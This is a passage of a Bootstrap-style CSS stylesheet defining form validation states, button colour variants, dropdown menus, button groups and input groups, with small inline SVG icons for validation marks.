margin-top: .1rem;
font-size: 0.875rem;
line-height: 1.5;
color: #ffffff;
background-color: rgba(220, 53, 69, 0.9);
border-radius: 0.25rem;
}
.was-validated .form-control:invalid, .form-control.is-invalid {
border-color: #dc3545;
padding-right: 2.25rem;
background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23dc3545' viewBox='-2 -2 7 7'%3e%3cpath stroke='%23dc3545' d='M0 0l3 3m0-3L0 3'/%3e%3ccircle r='.5'/%3e%3ccircle cx='3' r='.5'/%3e%3ccircle cy='3' r='.5'/%3e%3ccircle cx='3' cy='3' r='.5'/%3e%3c/svg%3E");
background-repeat: no-repeat;
background-position: center right calc(0.375em + 0.1875rem);
background-size: calc(0.75em + 0.375rem) calc(0.75em + 0.375rem);
}
.was-validated .form-control:invalid:focus, .form-control.is-invalid:focus {
border-color: #dc3545;
box-shadow: 0 0 0 0 rgba(220, 53, 69, 0.25);
}
.was-validated .form-control:invalid ~ .invalid-feedback,
.was-validated .form-control:invalid ~ .invalid-tooltip, .form-control.is-invalid ~ .invalid-feedback,
.form-control.is-invalid ~ .invalid-tooltip {
display: block;
}
.was-validated textarea.form-control:invalid, textarea.form-control.is-invalid {
padding-right: 2.25rem;
background-position: top calc(0.375em + 0.1875rem) right calc(0.375em + 0.1875rem);
}
.was-validated .custom-select:invalid, .custom-select.is-invalid {
border-color: #dc3545;
padding-right: calc((1em + 0.75rem) * 3 / 4 + 1.75rem);
background: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3E%3Cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3E%3C/svg%3E") no-repeat right 0.75rem center/8px 10px, url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23dc3545' viewBox='-2 -2 7 7'%3e%3cpath stroke='%23dc3545' d='M0 0l3 3m0-3L0 3'/%3e%3ccircle r='.5'/%3e%3ccircle cx='3' r='.5'/%3e%3ccircle cy='3' r='.5'/%3e%3ccircle cx='3' cy='3' r='.5'/%3e%3c/svg%3E") #ffffff no-repeat center right 1.75rem/calc(0.75em + 0.375rem) calc(0.75em + 0.375rem);
}
.was-validated .custom-select:invalid:focus, .custom-select.is-invalid:focus {
border-color: #dc3545;
box-shadow: 0 0 0 0 rgba(220, 53, 69, 0.25);
}
.was-validated .custom-select:invalid ~ .invalid-feedback,
.was-validated .custom-select:invalid ~ .invalid-tooltip, .custom-select.is-invalid ~ .invalid-feedback,
.custom-select.is-invalid ~ .invalid-tooltip {
display: block;
}
.was-validated .form-control-file:invalid ~ .invalid-feedback,
.was-validated .form-control-file:invalid ~ .invalid-tooltip, .form-control-file.is-invalid ~ .invalid-feedback,
.form-control-file.is-invalid ~ .invalid-tooltip {
display: block;
}
.was-validated .form-check-input:invalid ~ .form-check-label, .form-check-input.is-invalid ~ .form-check-label {
color: #dc3545;
}
.was-validated .form-check-input:invalid ~ .invalid-feedback,
.was-validated .form-check-input:invalid ~ .invalid-tooltip, .form-check-input.is-invalid ~ .invalid-feedback,
.form-check-input.is-invalid ~ .invalid-tooltip {
display: block;
}
.was-validated .custom-control-input:invalid ~ .custom-control-label, .custom-control-input.is-invalid ~ .custom-control-label {
color: #dc3545;
}
.was-validated .custom-control-input:invalid ~ .custom-control-label::before, .custom-control-input.is-invalid ~ .custom-control-label::before {
border-color: #dc3545;
}
.was-validated .custom-control-input:invalid ~ .invalid-feedback,
.was-validated .custom-control-input:invalid ~ .invalid-tooltip, .custom-control-input.is-invalid ~ .invalid-feedback,
.custom-control-input.is-invalid ~ .invalid-tooltip {
display: block;
}
.was-validated .custom-control-input:invalid:checked ~ .custom-control-label::before, .custom-control-input.is-invalid:checked ~ .custom-control-label::before {
border-color: #e4606d;
background-color: #e4606d;
}
.was-validated .custom-control-input:invalid:focus ~ .custom-control-label::before, .custom-control-input.is-invalid:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 0 rgba(220, 53, 69, 0.25);
}
.was-validated .custom-control-input:invalid:focus:not(:checked) ~ .custom-control-label::before, .custom-control-input.is-invalid:focus:not(:checked) ~ .custom-control-label::before {
border-color: #dc3545;
}
.was-validated .custom-file-input:invalid ~ .custom-file-label, .custom-file-input.is-invalid ~ .custom-file-label {
border-color: #dc3545;
}
.was-validated .custom-file-input:invalid ~ .invalid-feedback,
.was-validated .custom-file-input:invalid ~ .invalid-tooltip, .custom-file-input.is-invalid ~ .invalid-feedback,
.custom-file-input.is-invalid ~ .invalid-tooltip {
display: block;
}
.was-validated .custom-file-input:invalid:focus ~ .custom-file-label, .custom-file-input.is-invalid:focus ~ .custom-file-label {
border-color: #dc3545;
box-shadow: 0 0 0 0 rgba(220, 53, 69, 0.25);
}
.form-inline {
display: -ms-flexbox;
display: flex;
-ms-flex-flow: row wrap;
flex-flow: row wrap;
-ms-flex-align: center;
align-items: center;
}
.form-inline .form-check {
width: 100%;
}
@media (min-width: 576px) {
.form-inline label {
display: -ms-flexbox;
display: flex;
-ms-flex-align: center;
align-items: center;
-ms-flex-pack: center;
justify-content: center;
margin-bottom: 0;
}
.form-inline .form-group {
display: -ms-flexbox;
display: flex;
-ms-flex: 0 0 auto;
flex: 0 0 auto;
-ms-flex-flow: row wrap;
flex-flow: row wrap;
-ms-flex-align: center;
align-items: center;
margin-bottom: 0;
}
.form-inline .form-control {
display: inline-block;
width: auto;
vertical-align: middle;
}
.form-inline .form-control-plaintext {
display: inline-block;
}
.form-inline .input-group,
.form-inline .custom-select {
width: auto;
}
.form-inline .form-check {
display: -ms-flexbox;
display: flex;
-ms-flex-align: center;
align-items: center;
-ms-flex-pack: center;
justify-content: center;
width: auto;
padding-left: 0;
}
.form-inline .form-check-input {
position: relative;
-ms-flex-negative: 0;
flex-shrink: 0;
margin-top: 0;
margin-right: 0.25rem;
margin-left: 0;
}
.form-inline .custom-control {
-ms-flex-align: center;
align-items: center;
-ms-flex-pack: center;
justify-content: center;
}
.form-inline .custom-control-label {
margin-bottom: 0;
}
}
.btn {
display: inline-block;
font-weight: 400;
color: #212529;
text-align: center;
vertical-align: middle;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
background-color: transparent;
border: 1px solid transparent;
padding: 0.375rem 0.75rem;
font-size: 1rem;
line-height: 1.5;
border-radius: 0.25rem;
transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
.btn {
transition: none;
}
}
.btn:hover {
color: #212529;
text-decoration: none;
}
.btn:focus, .btn.focus {
outline: 0;
box-shadow: none;
}
.btn.disabled, .btn:disabled {
opacity: 0.65;
box-shadow: none;
}
.btn:not(:disabled):not(.disabled):active, .btn:not(:disabled):not(.disabled).active {
box-shadow: none;
}
a.btn.disabled,
fieldset:disabled a.btn {
pointer-events: none;
}
.btn-primary {
color: #ffffff;
background-color: #007bff;
border-color: #007bff;
box-shadow: none;
}
.btn-primary:hover {
color: #ffffff;
background-color: #0069d9;
border-color: #0062cc;
}
.btn-primary:focus, .btn-primary.focus {
box-shadow: none, 0 0 0 0 rgba(38, 143, 255, 0.5);
}
.btn-primary.disabled, .btn-primary:disabled {
color: #ffffff;
background-color: #007bff;
border-color: #007bff;
}
.btn-primary:not(:disabled):not(.disabled):active, .btn-primary:not(:disabled):not(.disabled).active,
.show > .btn-primary.dropdown-toggle {
color: #ffffff;
background-color: #0062cc;
border-color: #005cbf;
}
.btn-primary:not(:disabled):not(.disabled):active:focus, .btn-primary:not(:disabled):not(.disabled).active:focus,
.show > .btn-primary.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(38, 143, 255, 0.5);
}
.btn-secondary {
color: #ffffff;
background-color: #6c757d;
border-color: #6c757d;
box-shadow: none;
}
.btn-secondary:hover {
color: #ffffff;
background-color: #5a6268;
border-color: #545b62;
}
.btn-secondary:focus, .btn-secondary.focus {
box-shadow: none, 0 0 0 0 rgba(130, 138, 145, 0.5);
}
.btn-secondary.disabled, .btn-secondary:disabled {
color: #ffffff;
background-color: #6c757d;
border-color: #6c757d;
}
.btn-secondary:not(:disabled):not(.disabled):active, .btn-secondary:not(:disabled):not(.disabled).active,
.show > .btn-secondary.dropdown-toggle {
color: #ffffff;
background-color: #545b62;
border-color: #4e555b;
}
.btn-secondary:not(:disabled):not(.disabled):active:focus, .btn-secondary:not(:disabled):not(.disabled).active:focus,
.show > .btn-secondary.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(130, 138, 145, 0.5);
}
.btn-success {
color: #ffffff;
background-color: #28a745;
border-color: #28a745;
box-shadow: none;
}
.btn-success:hover {
color: #ffffff;
background-color: #218838;
border-color: #1e7e34;
}
.btn-success:focus, .btn-success.focus {
box-shadow: none, 0 0 0 0 rgba(72, 180, 97, 0.5);
}
.btn-success.disabled, .btn-success:disabled {
color: #ffffff;
background-color: #28a745;
border-color: #28a745;
}
.btn-success:not(:disabled):not(.disabled):active, .btn-success:not(:disabled):not(.disabled).active,
.show > .btn-success.dropdown-toggle {
color: #ffffff;
background-color: #1e7e34;
border-color: #1c7430;
}
.btn-success:not(:disabled):not(.disabled):active:focus, .btn-success:not(:disabled):not(.disabled).active:focus,
.show > .btn-success.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(72, 180, 97, 0.5);
}
.btn-info {
color: #ffffff;
background-color: #17a2b8;
border-color: #17a2b8;
box-shadow: none;
}
.btn-info:hover {
color: #ffffff;
background-color: #138496;
border-color: #117a8b;
}
.btn-info:focus, .btn-info.focus {
box-shadow: none, 0 0 0 0 rgba(58, 176, 195, 0.5);
}
.btn-info.disabled, .btn-info:disabled {
color: #ffffff;
background-color: #17a2b8;
border-color: #17a2b8;
}
.btn-info:not(:disabled):not(.disabled):active, .btn-info:not(:disabled):not(.disabled).active,
.show > .btn-info.dropdown-toggle {
color: #ffffff;
background-color: #117a8b;
border-color: #10707f;
}
.btn-info:not(:disabled):not(.disabled):active:focus, .btn-info:not(:disabled):not(.disabled).active:focus,
.show > .btn-info.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(58, 176, 195, 0.5);
}
.btn-warning {
color: #1F2D3D;
background-color: #ffc107;
border-color: #ffc107;
box-shadow: none;
}
.btn-warning:hover {
color: #1F2D3D;
background-color: #e0a800;
border-color: #d39e00;
}
.btn-warning:focus, .btn-warning.focus {
box-shadow: none, 0 0 0 0 rgba(221, 171, 15, 0.5);
}
.btn-warning.disabled, .btn-warning:disabled {
color: #1F2D3D;
background-color: #ffc107;
border-color: #ffc107;
}
.btn-warning:not(:disabled):not(.disabled):active, .btn-warning:not(:disabled):not(.disabled).active,
.show > .btn-warning.dropdown-toggle {
color: #1F2D3D;
background-color: #d39e00;
border-color: #c69500;
}
.btn-warning:not(:disabled):not(.disabled):active:focus, .btn-warning:not(:disabled):not(.disabled).active:focus,
.show > .btn-warning.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(221, 171, 15, 0.5);
}
.btn-danger {
color: #ffffff;
background-color: #dc3545;
border-color: #dc3545;
box-shadow: none;
}
.btn-danger:hover {
color: #ffffff;
background-color: #c82333;
border-color: #bd2130;
}
.btn-danger:focus, .btn-danger.focus {
box-shadow: none, 0 0 0 0 rgba(225, 83, 97, 0.5);
}
.btn-danger.disabled, .btn-danger:disabled {
color: #ffffff;
background-color: #dc3545;
border-color: #dc3545;
}
.btn-danger:not(:disabled):not(.disabled):active, .btn-danger:not(:disabled):not(.disabled).active,
.show > .btn-danger.dropdown-toggle {
color: #ffffff;
background-color: #bd2130;
border-color: #b21f2d;
}
.btn-danger:not(:disabled):not(.disabled):active:focus, .btn-danger:not(:disabled):not(.disabled).active:focus,
.show > .btn-danger.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(225, 83, 97, 0.5);
}
.btn-light {
color: #1F2D3D;
background-color: #f8f9fa;
border-color: #f8f9fa;
box-shadow: none;
}
.btn-light:hover {
color: #1F2D3D;
background-color: #e2e6ea;
border-color: #dae0e5;
}
.btn-light:focus, .btn-light.focus {
box-shadow: none, 0 0 0 0 rgba(215, 218, 222, 0.5);
}
.btn-light.disabled, .btn-light:disabled {
color: #1F2D3D;
background-color: #f8f9fa;
border-color: #f8f9fa;
}
.btn-light:not(:disabled):not(.disabled):active, .btn-light:not(:disabled):not(.disabled).active,
.show > .btn-light.dropdown-toggle {
color: #1F2D3D;
background-color: #dae0e5;
border-color: #d3d9df;
}
.btn-light:not(:disabled):not(.disabled):active:focus, .btn-light:not(:disabled):not(.disabled).active:focus,
.show > .btn-light.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(215, 218, 222, 0.5);
}
.btn-dark {
color: #ffffff;
background-color: #343a40;
border-color: #343a40;
box-shadow: none;
}
.btn-dark:hover {
color: #ffffff;
background-color: #23272b;
border-color: #1d2124;
}
.btn-dark:focus, .btn-dark.focus {
box-shadow: none, 0 0 0 0 rgba(82, 88, 93, 0.5);
}
.btn-dark.disabled, .btn-dark:disabled {
color: #ffffff;
background-color: #343a40;
border-color: #343a40;
}
.btn-dark:not(:disabled):not(.disabled):active, .btn-dark:not(:disabled):not(.disabled).active,
.show > .btn-dark.dropdown-toggle {
color: #ffffff;
background-color: #1d2124;
border-color: #171a1d;
}
.btn-dark:not(:disabled):not(.disabled):active:focus, .btn-dark:not(:disabled):not(.disabled).active:focus,
.show > .btn-dark.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(82, 88, 93, 0.5);
}
.btn-outline-primary {
color: #007bff;
border-color: #007bff;
}
.btn-outline-primary:hover {
color: #ffffff;
background-color: #007bff;
border-color: #007bff;
}
.btn-outline-primary:focus, .btn-outline-primary.focus {
box-shadow: 0 0 0 0 rgba(0, 123, 255, 0.5);
}
.btn-outline-primary.disabled, .btn-outline-primary:disabled {
color: #007bff;
background-color: transparent;
}
.btn-outline-primary:not(:disabled):not(.disabled):active, .btn-outline-primary:not(:disabled):not(.disabled).active,
.show > .btn-outline-primary.dropdown-toggle {
color: #ffffff;
background-color: #007bff;
border-color: #007bff;
}
.btn-outline-primary:not(:disabled):not(.disabled):active:focus, .btn-outline-primary:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-primary.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(0, 123, 255, 0.5);
}
.btn-outline-secondary {
color: #6c757d;
border-color: #6c757d;
}
.btn-outline-secondary:hover {
color: #ffffff;
background-color: #6c757d;
border-color: #6c757d;
}
.btn-outline-secondary:focus, .btn-outline-secondary.focus {
box-shadow: 0 0 0 0 rgba(108, 117, 125, 0.5);
}
.btn-outline-secondary.disabled, .btn-outline-secondary:disabled {
color: #6c757d;
background-color: transparent;
}
.btn-outline-secondary:not(:disabled):not(.disabled):active, .btn-outline-secondary:not(:disabled):not(.disabled).active,
.show > .btn-outline-secondary.dropdown-toggle {
color: #ffffff;
background-color: #6c757d;
border-color: #6c757d;
}
.btn-outline-secondary:not(:disabled):not(.disabled):active:focus, .btn-outline-secondary:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-secondary.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(108, 117, 125, 0.5);
}
.btn-outline-success {
color: #28a745;
border-color: #28a745;
}
.btn-outline-success:hover {
color: #ffffff;
background-color: #28a745;
border-color: #28a745;
}
.btn-outline-success:focus, .btn-outline-success.focus {
box-shadow: 0 0 0 0 rgba(40, 167, 69, 0.5);
}
.btn-outline-success.disabled, .btn-outline-success:disabled {
color: #28a745;
background-color: transparent;
}
.btn-outline-success:not(:disabled):not(.disabled):active, .btn-outline-success:not(:disabled):not(.disabled).active,
.show > .btn-outline-success.dropdown-toggle {
color: #ffffff;
background-color: #28a745;
border-color: #28a745;
}
.btn-outline-success:not(:disabled):not(.disabled):active:focus, .btn-outline-success:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-success.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(40, 167, 69, 0.5);
}
.btn-outline-info {
color: #17a2b8;
border-color: #17a2b8;
}
.btn-outline-info:hover {
color: #ffffff;
background-color: #17a2b8;
border-color: #17a2b8;
}
.btn-outline-info:focus, .btn-outline-info.focus {
box-shadow: 0 0 0 0 rgba(23, 162, 184, 0.5);
}
.btn-outline-info.disabled, .btn-outline-info:disabled {
color: #17a2b8;
background-color: transparent;
}
.btn-outline-info:not(:disabled):not(.disabled):active, .btn-outline-info:not(:disabled):not(.disabled).active,
.show > .btn-outline-info.dropdown-toggle {
color: #ffffff;
background-color: #17a2b8;
border-color: #17a2b8;
}
.btn-outline-info:not(:disabled):not(.disabled):active:focus, .btn-outline-info:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-info.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(23, 162, 184, 0.5);
}
.btn-outline-warning {
color: #ffc107;
border-color: #ffc107;
}
.btn-outline-warning:hover {
color: #1F2D3D;
background-color: #ffc107;
border-color: #ffc107;
}
.btn-outline-warning:focus, .btn-outline-warning.focus {
box-shadow: 0 0 0 0 rgba(255, 193, 7, 0.5);
}
.btn-outline-warning.disabled, .btn-outline-warning:disabled {
color: #ffc107;
background-color: transparent;
}
.btn-outline-warning:not(:disabled):not(.disabled):active, .btn-outline-warning:not(:disabled):not(.disabled).active,
.show > .btn-outline-warning.dropdown-toggle {
color: #1F2D3D;
background-color: #ffc107;
border-color: #ffc107;
}
.btn-outline-warning:not(:disabled):not(.disabled):active:focus, .btn-outline-warning:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-warning.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(255, 193, 7, 0.5);
}
.btn-outline-danger {
color: #dc3545;
border-color: #dc3545;
}
.btn-outline-danger:hover {
color: #ffffff;
background-color: #dc3545;
border-color: #dc3545;
}
.btn-outline-danger:focus, .btn-outline-danger.focus {
box-shadow: 0 0 0 0 rgba(220, 53, 69, 0.5);
}
.btn-outline-danger.disabled, .btn-outline-danger:disabled {
color: #dc3545;
background-color: transparent;
}
.btn-outline-danger:not(:disabled):not(.disabled):active, .btn-outline-danger:not(:disabled):not(.disabled).active,
.show > .btn-outline-danger.dropdown-toggle {
color: #ffffff;
background-color: #dc3545;
border-color: #dc3545;
}
.btn-outline-danger:not(:disabled):not(.disabled):active:focus, .btn-outline-danger:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-danger.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(220, 53, 69, 0.5);
}
.btn-outline-light {
color: #f8f9fa;
border-color: #f8f9fa;
}
.btn-outline-light:hover {
color: #1F2D3D;
background-color: #f8f9fa;
border-color: #f8f9fa;
}
.btn-outline-light:focus, .btn-outline-light.focus {
box-shadow: 0 0 0 0 rgba(248, 249, 250, 0.5);
}
.btn-outline-light.disabled, .btn-outline-light:disabled {
color: #f8f9fa;
background-color: transparent;
}
.btn-outline-light:not(:disabled):not(.disabled):active, .btn-outline-light:not(:disabled):not(.disabled).active,
.show > .btn-outline-light.dropdown-toggle {
color: #1F2D3D;
background-color: #f8f9fa;
border-color: #f8f9fa;
}
.btn-outline-light:not(:disabled):not(.disabled):active:focus, .btn-outline-light:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-light.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(248, 249, 250, 0.5);
}
.btn-outline-dark {
color: #343a40;
border-color: #343a40;
}
.btn-outline-dark:hover {
color: #ffffff;
background-color: #343a40;
border-color: #343a40;
}
.btn-outline-dark:focus, .btn-outline-dark.focus {
box-shadow: 0 0 0 0 rgba(52, 58, 64, 0.5);
}
.btn-outline-dark.disabled, .btn-outline-dark:disabled {
color: #343a40;
background-color: transparent;
}
.btn-outline-dark:not(:disabled):not(.disabled):active, .btn-outline-dark:not(:disabled):not(.disabled).active,
.show > .btn-outline-dark.dropdown-toggle {
color: #ffffff;
background-color: #343a40;
border-color: #343a40;
}
.btn-outline-dark:not(:disabled):not(.disabled):active:focus, .btn-outline-dark:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-dark.dropdown-toggle:focus {
box-shadow: 0 0 0 0 rgba(52, 58, 64, 0.5);
}
.btn-link {
font-weight: 400;
color: #007bff;
text-decoration: none;
}
.btn-link:hover {
color: #0056b3;
text-decoration: none;
}
.btn-link:focus, .btn-link.focus {
text-decoration: none;
box-shadow: none;
}
.btn-link:disabled, .btn-link.disabled {
color: #6c757d;
pointer-events: none;
}
.btn-lg, .btn-group-lg > .btn {
padding: 0.5rem 1rem;
font-size: 1.25rem;
line-height: 1.5;
border-radius: 0.3rem;
}
.btn-sm, .btn-group-sm > .btn {
padding: 0.25rem 0.5rem;
font-size: 0.875rem;
line-height: 1.5;
border-radius: 0.2rem;
}
.btn-block {
display: block;
width: 100%;
}
.btn-block + .btn-block {
margin-top: 0.5rem;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
width: 100%;
}
.fade {
transition: opacity 0.15s linear;
}
@media (prefers-reduced-motion: reduce) {
.fade {
transition: none;
}
}
.fade:not(.show) {
opacity: 0;
}
.collapse:not(.show) {
display: none;
}
.collapsing {
position: relative;
height: 0;
overflow: hidden;
transition: height 0.35s ease;
}
@media (prefers-reduced-motion: reduce) {
.collapsing {
transition: none;
}
}
.dropup,
.dropright,
.dropdown,
.dropleft {
position: relative;
}
.dropdown-toggle {
white-space: nowrap;
}
.dropdown-toggle::after {
display: inline-block;
margin-left: 0.255em;
vertical-align: 0.255em;
content: "";
border-top: 0.3em solid;
border-right: 0.3em solid transparent;
border-bottom: 0;
border-left: 0.3em solid transparent;
}
.dropdown-toggle:empty::after {
margin-left: 0;
}
.dropdown-menu {
position: absolute;
top: 100%;
left: 0;
z-index: 1000;
display: none;
float: left;
min-width: 10rem;
padding: 0.5rem 0;
margin: 0.125rem 0 0;
font-size: 1rem;
color: #212529;
text-align: left;
list-style: none;
background-color: #ffffff;
background-clip: padding-box;
border: 1px solid rgba(0, 0, 0, 0.15);
border-radius: 0.25rem;
box-shadow: 0 0.5rem 1rem rgba(0, 0, 0, 0.175);
}
.dropdown-menu-left {
right: auto;
left: 0;
}
.dropdown-menu-right {
right: 0;
left: auto;
}
@media (min-width: 576px) {
.dropdown-menu-sm-left {
right: auto;
left: 0;
}
.dropdown-menu-sm-right {
right: 0;
left: auto;
}
}
@media (min-width: 768px) {
.dropdown-menu-md-left {
right: auto;
left: 0;
}
.dropdown-menu-md-right {
right: 0;
left: auto;
}
}
@media (min-width: 992px) {
.dropdown-menu-lg-left {
right: auto;
left: 0;
}
.dropdown-menu-lg-right {
right: 0;
left: auto;
}
}
@media (min-width: 1200px) {
.dropdown-menu-xl-left {
right: auto;
left: 0;
}
.dropdown-menu-xl-right {
right: 0;
left: auto;
}
}
.dropup .dropdown-menu {
top: auto;
bottom: 100%;
margin-top: 0;
margin-bottom: 0.125rem;
}
.dropup .dropdown-toggle::after {
display: inline-block;
margin-left: 0.255em;
vertical-align: 0.255em;
content: "";
border-top: 0;
border-right: 0.3em solid transparent;
border-bottom: 0.3em solid;
border-left: 0.3em solid transparent;
}
.dropup .dropdown-toggle:empty::after {
margin-left: 0;
}
.dropright .dropdown-menu {
top: 0;
right: auto;
left: 100%;
margin-top: 0;
margin-left: 0.125rem;
}
.dropright .dropdown-toggle::after {
display: inline-block;
margin-left: 0.255em;
vertical-align: 0.255em;
content: "";
border-top: 0.3em solid transparent;
border-right: 0;
border-bottom: 0.3em solid transparent;
border-left: 0.3em solid;
}
.dropright .dropdown-toggle:empty::after {
margin-left: 0;
}
.dropright .dropdown-toggle::after {
vertical-align: 0;
}
.dropleft .dropdown-menu {
top: 0;
right: 100%;
left: auto;
margin-top: 0;
margin-right: 0.125rem;
}
.dropleft .dropdown-toggle::after {
display: inline-block;
margin-left: 0.255em;
vertical-align: 0.255em;
content: "";
}
.dropleft .dropdown-toggle::after {
display: none;
}
.dropleft .dropdown-toggle::before {
display: inline-block;
margin-right: 0.255em;
vertical-align: 0.255em;
content: "";
border-top: 0.3em solid transparent;
border-right: 0.3em solid;
border-bottom: 0.3em solid transparent;
}
.dropleft .dropdown-toggle:empty::after {
margin-left: 0;
}
.dropleft .dropdown-toggle::before {
vertical-align: 0;
}
.dropdown-menu[x-placement^="top"], .dropdown-menu[x-placement^="right"], .dropdown-menu[x-placement^="bottom"], .dropdown-menu[x-placement^="left"] {
right: auto;
bottom: auto;
}
.dropdown-divider {
height: 0;
margin: 0.5rem 0;
overflow: hidden;
border-top: 1px solid #e9ecef;
}
.dropdown-item {
display: block;
width: 100%;
padding: 0.25rem 1rem;
clear: both;
font-weight: 400;
color: #212529;
text-align: inherit;
white-space: nowrap;
background-color: transparent;
border: 0;
}
.dropdown-item:hover, .dropdown-item:focus {
color: #16181b;
text-decoration: none;
background-color: #f8f9fa;
}
.dropdown-item.active, .dropdown-item:active {
color: #ffffff;
text-decoration: none;
background-color: #007bff;
}
.dropdown-item.disabled, .dropdown-item:disabled {
color: #6c757d;
pointer-events: none;
background-color: transparent;
}
.dropdown-menu.show {
display: block;
}
.dropdown-header {
display: block;
padding: 0.5rem 1rem;
margin-bottom: 0;
font-size: 0.875rem;
color: #6c757d;
white-space: nowrap;
}
.dropdown-item-text {
display: block;
padding: 0.25rem 1rem;
color: #212529;
}
.btn-group,
.btn-group-vertical {
position: relative;
display: -ms-inline-flexbox;
display: inline-flex;
vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
position: relative;
-ms-flex: 1 1 auto;
flex: 1 1 auto;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover {
z-index: 1;
}
.btn-group > .btn:focus, .btn-group > .btn:active, .btn-group > .btn.active,
.btn-group-vertical > .btn:focus,
.btn-group-vertical > .btn:active,
.btn-group-vertical > .btn.active {
z-index: 1;
}
.btn-toolbar {
display: -ms-flexbox;
display: flex;
-ms-flex-wrap: wrap;
flex-wrap: wrap;
-ms-flex-pack: start;
justify-content: flex-start;
}
.btn-toolbar .input-group {
width: auto;
}
.btn-group > .btn:not(:first-child),
.btn-group > .btn-group:not(:first-child) {
margin-left: -1px;
}
.btn-group > .btn:not(:last-child):not(.dropdown-toggle),
.btn-group > .btn-group:not(:last-child) > .btn {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.btn-group > .btn:not(:first-child),
.btn-group > .btn-group:not(:first-child) > .btn {
border-top-left-radius: 0;
border-bottom-left-radius: 0;
}
.dropdown-toggle-split {
padding-right: 0.5625rem;
padding-left: 0.5625rem;
}
.dropdown-toggle-split::after,
.dropup .dropdown-toggle-split::after,
.dropright .dropdown-toggle-split::after {
margin-left: 0;
}
.dropleft .dropdown-toggle-split::before {
margin-right: 0;
}
.btn-sm + .dropdown-toggle-split, .btn-group-sm > .btn + .dropdown-toggle-split {
padding-right: 0.375rem;
padding-left: 0.375rem;
}
.btn-lg + .dropdown-toggle-split, .btn-group-lg > .btn + .dropdown-toggle-split {
padding-right: 0.75rem;
padding-left: 0.75rem;
}
.btn-group.show .dropdown-toggle {
box-shadow: none;
}
.btn-group.show .dropdown-toggle.btn-link {
box-shadow: none;
}
.btn-group-vertical {
-ms-flex-direction: column;
flex-direction: column;
-ms-flex-align: start;
align-items: flex-start;
-ms-flex-pack: center;
justify-content: center;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group {
width: 100%;
}
.btn-group-vertical > .btn:not(:first-child),
.btn-group-vertical > .btn-group:not(:first-child) {
margin-top: -1px;
}
.btn-group-vertical > .btn:not(:last-child):not(.dropdown-toggle),
.btn-group-vertical > .btn-group:not(:last-child) > .btn {
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn:not(:first-child),
.btn-group-vertical > .btn-group:not(:first-child) > .btn {
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.btn-group-toggle > .btn,
.btn-group-toggle > .btn-group > .btn {
margin-bottom: 0;
}
.btn-group-toggle > .btn input[type="radio"],
.btn-group-toggle > .btn input[type="checkbox"],
.btn-group-toggle > .btn-group > .btn input[type="radio"],
.btn-group-toggle > .btn-group > .btn input[type="checkbox"] {
position: absolute;
clip: rect(0, 0, 0, 0);
pointer-events: none;
}
.input-group {
position: relative;
display: -ms-flexbox;
display: flex;
-ms-flex-wrap: wrap;
flex-wrap: wrap;
-ms-flex-align: stretch;
align-items: stretch;
width: 100%;
}
.input-group > .form-control,
.input-group > .form-control-plaintext,
.input-group > .custom-select,
.input-group > .custom-file {
position: relative;
-ms-flex: 1 1 auto;
flex: 1 1 auto;
width: 1%;
margin-bottom: 0;
}
.input-group > .form-control + .form-control,
.input-group > .form-control + .custom-select,
.input-group > .form-control + .custom-file,
.input-group > .form-control-plaintext + .form-control,
.input-group > .form-control-plaintext + .custom-select,
.input-group > .form-control-plaintext + .custom-file,
.input-group > .custom-select + .form-control,
.input-group > .custom-select + .custom-select,
.input-group > .custom-select + .custom-file,
.input-group > .custom-file + .form-control,
.input-group > .custom-file + .custom-select,
.input-group > .custom-file + .custom-file {
margin-left: -1px;
}
.input-group > .form-control:focus,
.input-group > .custom-select:focus,
.input-group > .custom-file .custom-file-input:focus ~ .custom-file-label {
z-index: 3;
}
.input-group > .custom-file .custom-file-input:focus {
z-index: 4;
}
.input-group > .form-control:not(:last-child),
.input-group > .custom-select:not(:last-child) {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.input-group > .form-control:not(:first-child),
.input-group > .custom-select:not(:first-child) {
border-top-left-radius: 0;
border-bottom-left-radius: 0;
}
.input-group > .custom-file {
display: -ms-flexbox;
display: flex;
-ms-flex-align: center;
align-items: center;
}
.input-group > .custom-file:not(:last-child) .custom-file-label,
